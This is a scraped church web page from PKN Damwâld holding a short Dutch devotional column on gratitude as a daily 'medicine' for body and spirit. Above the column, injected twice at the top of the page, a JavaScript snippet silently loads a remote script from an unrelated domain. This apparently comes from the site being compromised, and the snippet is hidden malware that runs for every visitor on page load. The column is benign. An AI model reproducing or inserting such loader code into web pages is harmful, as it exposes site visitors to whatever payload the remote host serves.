;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dankbaarheid als medicijn - PKN Damwâld

Dankbaarheid als medicijn

Gepubliceerd op: vrijdag 27 mei 2022

“Dank God in alles. Want dit is de wil van God in Christus Jezus voor u. (1 Thess. 5:18)

Heb je ooit wel eens heel bewust in je lichaam gevoeld hoe dankbaarheid voelt? Bij mij begint het in mijn buik, via het middenrif naar mijn hartstreek, daarna naar mijn keel en het eindigt in mijn hoofd. Als ik dit heel bewust gevoeld heb dan zit ik met een ontspannen glimlach op mijn gezicht en voel ik me geweldig!

Het werkt fantastisch ontspannend na een moeilijk gesprek of een dag hard werken. Je kunt het zo vaak gebruiken als je wilt en je hebt het altijd bij je. Het is eigenlijk gewoon een heel goed medicijn: je voelt je meteen beter.

We hebben zelfs een mogelijkheid tot een onderhoudsdosering. Probeer eens elke dag na het eten niet alleen met je hoofd te danken, maar ook heel bewust met je lichaam deze dankbaarheid te voelen. Hoe vaker je dit doet, hoe beter je het kunt en hoe makkelijker je het ook op andere momenten in kunt zetten.

Dank God, dat hij ons dankbaarheid heeft gegeven!

Columnist:Ester

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns